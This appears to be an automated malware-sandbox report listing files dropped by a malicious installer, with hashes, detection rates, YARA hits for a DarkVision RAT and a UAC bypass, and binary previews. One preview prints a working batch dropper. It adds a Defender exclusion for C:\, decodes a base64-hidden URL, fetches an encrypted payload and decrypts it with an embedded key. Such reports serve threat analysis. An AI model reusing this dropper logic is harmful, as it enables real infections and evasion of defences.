SHA-512:	0C387B9F791286B427A12B0A4E43A7043065F3A6E40B0FE92AB80B3A52BE8D0B2B71B5AA39BDC04C26E9B4F71E0CC337FD78CCBDA4A3610D740421281F4E3553
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....Vg..........".......... ......w.............@..........................0.......J....@...@.......@.....................d...\|....@..Pe.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Pe...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1856000
Entropy (8bit):	7.9468855325243615
Encrypted:	false
SSDEEP:	49152:i9NLtoGUoSOL+FJPG0e7sHlB60zOGD1UTE/:QJZT0PG0eTeOGDqA
MD5:	F15A88B85AFA75FB85FB70E83071E286
SHA1:	F34100EBCA880311DF1082B72A01D380948C75FF
SHA-256:	B3E4BE8C35C51703B96863766CEF23D57C03A80425D9B3942EF99CD8F54A5950
SHA-512:	DAFF513539B56B38E47A6DE1D1AD36D3510B96ED4121282FC6797533CE9DE94C145E9BCCE44FBB3CC123F3C1595299E3E0AB4C42913004D0153C4EC499669B51
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug.............................pI...........@...........................I.....@Y....@.................................\@..p....0.......................A...................................................................................... . . .......B..................@....rsrc........0.......R..............@....idata .....@.......V..............@... .@..P.......X..............@...izjfeliq....../......Z..............@...vizxjewx.....`I....................@....taggant.0...pI.."...0..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	124416
Entropy (8bit):	6.478803320046224
Encrypted:	false
SSDEEP:	3072:a2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXG2:7bJhs7QW69hd1MMdxPe9N9uA0hu9TBD2
MD5:	A3D68745E8919E2A48D8FA0738DA124E
SHA1:	85EA6AB1D2D3F6AF2011B130756D57F31539E171
SHA-256:	65BC085F99DB63B0581B2153A0AA2D7151133AAFEEB2810F56A5D17EF9760D46
SHA-512:	99575B08E17DD409E2CEDE4996BFC812EBE430A811F96B5C08E3093BE8149E2AA148C4D7B71F1C24B5D2BE592567494EA0118E355839FC83AB3603A34098A5AC
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....msZ........../....2.`.....................@.............................0....................................................................... ..................................................................................H............................code....Z.......\.................. ..`.text........p.......`.............. ..`.rdata..-K.......L...d..............@..@.pdata..............................@..@.data....#..........................@....rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1856000
Entropy (8bit):	7.9468855325243615
Encrypted:	false
SSDEEP:	49152:i9NLtoGUoSOL+FJPG0e7sHlB60zOGD1UTE/:QJZT0PG0eTeOGDqA
MD5:	F15A88B85AFA75FB85FB70E83071E286
SHA1:	F34100EBCA880311DF1082B72A01D380948C75FF
SHA-256:	B3E4BE8C35C51703B96863766CEF23D57C03A80425D9B3942EF99CD8F54A5950
SHA-512:	DAFF513539B56B38E47A6DE1D1AD36D3510B96ED4121282FC6797533CE9DE94C145E9BCCE44FBB3CC123F3C1595299E3E0AB4C42913004D0153C4EC499669B51
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 39%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Ug.............................pI...........@...........................I.....@Y....@.................................\@..p....0.......................A...................................................................................... . . .......B..................@....rsrc........0.......R..............@....idata .....@.......V..............@... .@..P.......X..............@...izjfeliq....../......Z..............@...vizxjewx.....`I....................@....taggant.0...pI.."...0..............@...................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013373001\2bd330404c.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1784320
Entropy (8bit):	7.945787921464081
Encrypted:	false
SSDEEP:	49152:/m8fa0CeXtsNwgWK+Hqc+5jaye1VwlFbOZjj:eyy/5HjS1elF8j
MD5:	1CCD476EF1CB8A55170A6EF196DFB053
SHA1:	5BF1B3781099129A92A2925576C1628F65AC9E19
SHA-256:	9B25C62D773C36FE7BB6C02204F61B1CA0FD6C4D1A9F1245DD917E3439D01588
SHA-512:	9FFA61CF282F77A01855237BAB9BBCB7BDDB24383D643C7D89A58BDA6F34B18F628EE743E1782AEE3685D5BDF410472A857B035CEAA350D153154E1B50234513
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.\|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........h...........@...........................h.....H.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... .0*...$......\|..............@...pjdaqopi......N......~..............@...opjfflev......h.....................@....taggant.0....h.."..................@...................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	970752
Entropy (8bit):	6.703980740158007
Encrypted:	false
SSDEEP:	24576:yqDEvCTbMWu7rQYlBQcBiT6rprG8aEYOb:yTvC/MTQYxsWR7aE
MD5:	03C3B35F938A1BC015E2579A7FB58015
SHA1:	3FDFB37C9EAB06C72CF651157B9CFB6182FA468E
SHA-256:	130610FD4154CD5B5E146AD854FB21E0F694C35161BE73D634B5AEA9850E3E8B
SHA-512:	0C387B9F791286B427A12B0A4E43A7043065F3A6E40B0FE92AB80B3A52BE8D0B2B71B5AA39BDC04C26E9B4F71E0CC337FD78CCBDA4A3610D740421281F4E3553
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 21%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....Vg..........".......... ......w.............@..........................0.......J....@...@.......@.....................d...\|....@..Pe.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...Pe...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2724864
Entropy (8bit):	6.482981417733064
Encrypted:	false
SSDEEP:	24576:e9QWbKVx5Hi0acTZ7UtSXl+sCJFDfxXJpBIIs8EEV0qc1bTRBDyyydNDIM3OuJJI:e7bixU0acdd+rU8Y1bTfDyyxX8Q95
MD5:	A45A51347A496E17A3427A34E1B27447
SHA1:	96A78501643CDDC6085BE113BCC1DA7E3D6F8F51
SHA-256:	AB9AE453090CEE1DA838F1E17BE5ECB435987168B10A649DA876A6DF6D27DC27
SHA-512:	E9C2AD3FBF06C23088A055C19CF449221C2DCFD0584648D01A86976400BE4B590CF183065C9DAC1166AD1F78D915D98913926DD1BE1E01A1937EE458922365DB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$.............. ...`....@.. .......................@......>...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...quaaapuk.@)......2)..:..............@...agtviptv. ....)......l).............@....taggant.@......"...r).............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat

Download File

Process:	C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2006
Entropy (8bit):	5.290230213116548
Encrypted:	false
SSDEEP:	48:Zld+LwqTf/OR9Q1P31Thl5RqAmC/9T5v6MQVQrBt:ZD8Tf/BPFVt5v6sBt
MD5:	77CE738D9B82E6EBFCFA3F1081F037FC
SHA1:	C4DB7196464F86B05AC3532D99175D2EB09CA7DD
SHA-256:	24FEFBB2301EBD0814FBEE1EDB6B28DAFC871DA247DEFA69BFA3FB999AC8D7C1
SHA-512:	52AFE5FAA53DEB5D555A7A9FC0F5B8F57503F837BCC8B54E2B7D6819952644B8A6A077C77EF3FBF2AF84AE78B086AB547AF393F9290C1EC69929687D8837D70E
Malicious:	true
Preview:	@shift /0..@echo off....net session >nul 2>&1..if %errorlevel% neq 0 (.. powershell -Command "Start-Process -Verb RunAs -FilePath '%~dpnx0' -ArgumentList '/nobreak'".. exit /b..)......PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"....setlocal......set "encoded_url=aHR0cHM6Ly93b28wOTc4Nzg3ODEud2luL2Rvd25sb2FkZWRfZmlsZS5iaW4=" ..set "output=%temp%\downloaded_file.bin" ....powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('%encoded_url%'))) -OutFile '%output%'"......set "key=blMgb+WrfPrXMFxK7ymKPM3SVHUAYPt9" ..set "iv=5t9nsUPo0cA/tUjH" ......set "retries=5"..set "delay=10"....for /L %%i in (1,1,%retries%) do (.. timeout /t %delay% /nobreak >nul.. if exist "%output%" (.. .. powershell -WindowStyle Hidden -Command ^.. "$key = [System.Text.Encoding]::UTF8.GetBytes('%key%');" ^.. "$iv = [System.Text.Encoding]::UTF8.GetBytes('%iv%

C:\Users\user\AppData\Local\Temp\DATABASE

Download File

Process:	C:\Windows\explorer.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hfdyaiuf.3af.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_io2uls3c.il1.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jtggfgxp.luh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l5l53r3j.ivu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mamcajlj.rjm.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nnlejwow.plk.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_no0if2ix.1hv.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o214wsuu.jk2.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pm4fumm3.i1k.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0yu1m0w.bxb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vj4qnlwu.bkz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w1n0tfee.ffd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3248128
Entropy (8bit):	6.654100285282799
Encrypted:	false
SSDEEP:	98304:pLPTyc5Jt2SKP64GsNe+WPvvFmuY6/JsYk:xTyc7me+W3v9Y6
MD5:	22BF111E0FFBCE40DA98521C8AC390AC
SHA1:	86C47F8FC939E81D7CEBA37F1824E22CE4EF1F43
SHA-256:	0536C8987BBF4C736EE1FFABA0CB1E52D1652574FCB80AB14FF7D23A40E446B2
SHA-512:	A9D529513D988C20380432D0CE1F10B6286A949442F6964BA455D14F51D308810B495D6E04EC375C9A990230F04A1444E7A9647C205A38275AAE08B34408D30E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f..............................1...........@...........................1.....MK2...@.................................W...k...........................d.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...fhtimfgd..........................@...btpwxgez......1......j1.............@....taggant.0....1.."...n1.............@...........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\downloaded_file.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	515600
Entropy (8bit):	7.99963177911539
Encrypted:	true
SSDEEP:	12288:QdzOJGhg2nfH8n9/2FZjsOdj81w/U2CPYjqRXNOB:Q9OUO2fYCZY2GdYj4g
MD5:	8D7493DB663BD32F51A5CEA961029033
SHA1:	1DEB3CDCD775919484EC770C7AE0422BDD9C046E
SHA-256:	67B5F51094A8B094886BF57EFD576EDF76049D301525743A74B920F1E4E3F204
SHA-512:	2E56A1FBBFA4AC54B72415ABCF65FE912E89029E2058DBCD6C0B95511A7CBDFC155B859D262D5CD959B5C7027431F5E4CC441EB0ACA60E960959D3EFECC9E0CB
Malicious:	true
Preview:	.....QS.o..(...,&..5.[........1Y........!v6gk..P......_......Pc~..V._Q.(N..j.....i..r.x.{.fX.hy.\q2....&.i..:).e..+..{.g;...?.K..\|6.. .5.........I.RG.[..6..v...:.E..)?......M..`.w....z.[f.C. ..?..o.,....x..k..O.1..6...A......gm..@...I..&...'..X.#X.p..../......F.uZ...dA3.W...Z....o.B..S.9....Y.9...0@}.i..]<?..........;5..\|rL.......H..6....g.s&G./_..\|(\-ys...a.(.F.Ou1....B9nW./a..I....5....~d..,..."_....~..:?M..7.g.r....@..._V...w4[\ZZ.k..k.@...3.K....6.........g..<.I..B...\|3........M....k.{.............:.U<d1>...s3....w.O.X.\.O.n/.f&..D...:sm..y...66\|8W.r.!.d............A.y0._...>.-..(.:/M.R......1.u.5...O.Dq.$...%.&.4/.......:....../,...e.....2a.......FDzN..9.[.^.........m}.e....f....~.....h.`H.'....o.m.\|.>..V..1.....X.=......(u..z....I3Q....p......(.K...{...(..0ga0.;.......m..s..s......vQx .a....P`....b.k...j~Vm.C.0.b...........R....>H...VNL]`..P.V..K..-I..F...xt.....z.89}i( ..l..z.=.....Z(s....L{1..1zQ.O.....*Bb..s.$...

C:\Users\user\AppData\Local\Temp\downloaded_file.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	515584
Entropy (8bit):	6.2318905021613515
Encrypted:	false
SSDEEP:	6144:BRHP4vL3s5+CM6OW0nUBiwCCWfS34mbWMkRONOgbBpiEVBHl8ba2z7rkBiL:BRHP63srM6AbCWfS34mSMkrCpPFBE
MD5:	D60C9E070239F8C240AAA6D8832E11EF
SHA1:	AAAC23A338A91505C56C3057D22A14BF190A2795
SHA-256:	493F1BD7227C4EE9430F8AD226E929908996B97A28F578A850E9B26C393AD2D2
SHA-512:	D70CF79DEC352BD965F8506AD989375642A8931300D5497724C82882AE4D57CCC314D4E6B24C398075AF3DEB4433207522106647E70E74C90E56791E20BCA42C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DarkVisionRat, Description: Yara detected DarkVision Rat, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, Author: ditekSHen
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W...9...9...9.......9..U....9......9......9...8.K.9..U....9..U....9..U....9..U....9..U....9.Rich..9.........................PE..L.....6g............................lb....... ....@..........................P............@....................................d................................/.....................................@............ ...............................text............................... ..`.rdata....... ......................@..@.data....4..........................@....rsrc...............................@..@.reloc...=.......>..................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.4593089050301797
Encrypted:	false
